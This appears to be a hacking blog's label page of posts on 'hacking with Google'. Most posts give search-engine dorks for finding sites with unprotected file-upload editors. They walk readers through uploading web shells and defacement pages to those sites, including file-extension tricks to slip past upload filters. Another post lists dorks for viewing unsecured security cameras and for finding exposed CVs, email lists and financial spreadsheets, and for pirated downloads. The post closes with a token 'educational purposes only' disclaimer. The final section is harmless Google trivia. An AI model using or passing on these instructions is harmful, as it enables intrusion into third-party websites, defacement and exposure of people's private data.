Showing posts with label Hack with google. Show all posts
Showing posts with label Hack with google. Show all posts



Dork: inurl:/editor/tmedit/popups
Exploit Path : /editor/tmedit/popups/InsertFile/insert_file.php

#start :)

open Google.com or Bing.com and type this dork inurl:/editor/tmedit/popups

i got 9740 vulnrable results, now select any site from seacrh result and look for upload option on that Page now upload you shell, deface page, or anyfile there,

After uploading your file you'll see your uploaded file's url there, if you are not getting any perview url then goto /images directory to view your uploaded file

for example : http://vulnrablesite.com/images/yourfilehere

Labels: , , , , , ,

Dork www.topronet.com ,All Rights Reserved.Any question, please email me cqq1978@Gmail.com

and 

JFoler 1.0 A jsp based web folder management tool by Steven Cee

(its not a Particular dork, please try to modify it and if you sucessfull modified then leave new dork in comment)

Just select any site from search results and now upload your deface page or shell

shell upload : for shell uploading rename your asp shell (shell.asp) to shell.jsp then upload it, you can try .php too, every Extension is allowed but in some sites you can't excute php and asp shell

Path : depends on website






Labels: , , , , ,



Google serves almost 80 percent of all search queries on the Internet, proving itself as the most popular search engine. However Google makes it possible to reach not only the publicly available information resources, but also gives access to some of the most confidential information that should never have been revealed. In this post I will show how to use Google for exploiting security vulnerabilities within websites. The following are some of the hacks that can be accomplished using Google.







1. Hacking Security Cameras :



There exists many security cameras used for monitoring places like parking lots, college campus, road traffic etc. which can be hacked using Google so that you can view the images captured by those cameras in real time. All you have to do is use the following search query in Google. Type in Google search box exactly as follows and hit enter



inurl:”viewerframe?mode=motion”


Click on any of the search results (Top 5 recommended) and you will gain access to the live camera which has full controls.



Its as if your computer is a remote control and no one can track you down!! Well for me i got into a zoo’s webcam and i could see a lady feeding the Giraffe



Using this trick you can see live stuff with a fast internet connection including Baseball matches and soccer matches by adding a few more keywords in the line



You can also move the cameras in all the four directions, perform actions such as zoom in and zoom out. This camera has really a less refresh rate. But there are other search queries through which you can gain access to other cameras which have faster refresh rates. So to access them just use the following search query.



intitle:”Live View / – AXIS”


Click on any of the search results to access a different set of live cameras. Thus you have hacked Security Cameras using Google.



2. Hacking Personal and Confidential Documents



Using Google it is possible to gain access to an email repository containing CV of hundreds of people which were created when applying for their jobs. The documents containing their Address, Phone, DOB, Education, Work experience etc. can be found just in seconds.



intitle:”curriculum vitae” “phone * * *” “address *” “e-mail”


You can gain access to a list of .xls (excel documents) which contain contact details including email addresses of large group of people. To do so type the following search query and hit enter.



filetype:xls inurl:”email.xls”



Also it’s possible to gain access to documents potentially containing information on bank accounts, financial summaries and credit card numbers using the following search query



intitle:index.of finances.xls


3. Hacking Google to gain access to Free Stuffs



Ever wondered how to hack Google for free music or ebooks. Well here is a way to do that. To download free music just enter the following query on google search box and hit enter.



“?intitle:index.of?mp3 eminem“


Now you’ll gain access to the whole index of eminem album where in you can download the songs of your choice. Instead of eminem you can subtitute the name of your favorite album. To search for the ebooks all you have to do is replace “eminem” with your favorite book name. Also replace “mp3? with “pdf” or “zip” or “rar”.



Note: This Information is for educational purposes only Ashtricks and its owner is not responsible for anything done by you

Labels: , , , , , ,

Google Dork inurl:ezfilemanager/ezfilemanager.php

(Modify this dork for getting mor results from Google =)



Exploit : http://[xxx]/xxx/tiny_mce/plugins/ezfilemanager/ezfilemanager.php?sa=1&type=file


Go to this url : website.com/lap/includes/tiny_mce/plugins/ezfilemanager/ezfilemanager.php and 
put ?sa=1&type=file after URL
now url will be :  http://website/PATCH/tiny_mce/plugins/ezfilemanager/ezfilemanager.php?sa=1&type=file


Now see upload option and upload you file, you can upload ,html ,pdf ,ppt ,txt ,doc ,rtf ,xml ,xsl ,dtd ,zip ,rar ,jpg ,png files


Labels: , , , , ,

Go to Google.com and enter dork ~ 

"inurl:simple-upload-53.php" 



see search results and select any website 





the exploit url will be link this 





http://www.site.com/simple-upload-53.php





Now Upolad Your shell here as .php.jpg .php.girf etc 

and you can upload your deface in image Type





to view you uploaded file just goto http://www.site.com/files/yourfilehere

Labels: , , , , ,



Google Dork : inurl:/HTMLEditor/editor/ 

or "inurl:/HTMLEditor/editor//filemanager/"

or "inurl:/HTMLEditor/editor//filemanager//connectors/"





Exploit : http://website/HTMLEditor/editor/filemanager/connectors/uploadtest.html

or http://website/path/HTMLEditor/editor/filemanager/connectors/uploadtest.html





Go here :



http://website/HTMLEditor/editor/filemanager/connectors/uploadtest.html


or http://website/path/HTMLEditor/editor/filemanager/connectors/uploadtest.html

 chnage connectors into PhP (Like FCKeditor) and upload Your file





suppoted files : .TXT and .JPG in some site you can upload .html and .php too





to view you file goto : http://website/PowerCMS%20folder/files/your file here

or http://website/patch//PowerCMS%20folder/files/your file here 


Examples :

Labels: , , , , , ,

You might also like: Awesome Google tricks- Dorks

 

Google is Feeling Lucky. What About You?

15 Google "I'm Feeling Lucky" Tricks
Have you ever wondered about that little "I'm Feeling Lucky" widget that Google has on their homepage? That really tiny button located just below the space where one would have to key in text? The geniuses behind Google describe the "I'm Feeling Lucky" function as a search option that will ensure that a user spends less time searching for web pages, and therefore, spends more time looking at them. So, in layman's terms, when you type in a keyword and utilize the "I'm Feeling Lucky" button, instead of getting the usual and oh-so familiar gazillion blue colored text links, Google auto-magically transports you to the webpage that it feels most matches your search. Simply key in the suggest keywords and be amused and inspired by the creativity of Google. For example, here's one to start the ball rolling. Type "Who's the cutest" and click the "I'm Feeling Lucky" button. Go on... I'll wait. Cute eh? I'm sure there are many other unique keywords and tricks that we have not included, so perhaps you'd like to chip in with a few suggestions? Have fun! keywords( search it on Google & press the First Result)

Ewmew Fudd



Google Bork



Google Chav



Google Chuck Norris



Google Epic



Google Gravity



Google Hacker



Google Klingon



Google Love



Google Pacman



Google Piglatin



Google Pirate



Google Sphere



Google Weenie



Me in 10 Years


Screen Capture  



sphere wallpapers Balls by Robin de Blanche

Ewmew Fudd



sphere wallpapers Composition Black Red by Epheus

Google Bork



sphere wallpapers Electrodes by DeathLink6-0

Google Chav



sphere wallpapers I Daydream in 3D by Skokie

Google Chuck Norris



sphere wallpapers Mountain Path by DeathLink6-0

Google Epic



sphere wallpapers One Day Soon by skugga

Google Gravity



sphere wallpapers Padded Room by James Roundy

Google Hacker



sphere wallpapers Pathway CV1 by Epheus

Google Klingon



sphere wallpapers Poke Ball Pair by Calzinger

Google Love



sphere wallpapers Red Glow Balls on Red Floor by Manny Gonzalez

Google Pacman



sphere wallpapers Room by Ballashoes

Google Piglatin



sphere wallpapers Swarm by DeathLink6-0

Google Pirate



sphere wallpapers Valley by DeathLink6-0

Google Sphere



sphere wallpapers Velocity Red by Epheus

Google Weenie



sphere wallpapers White Sphere by Jimmy Gibbs

Me in 10 Years
 

Labels: , ,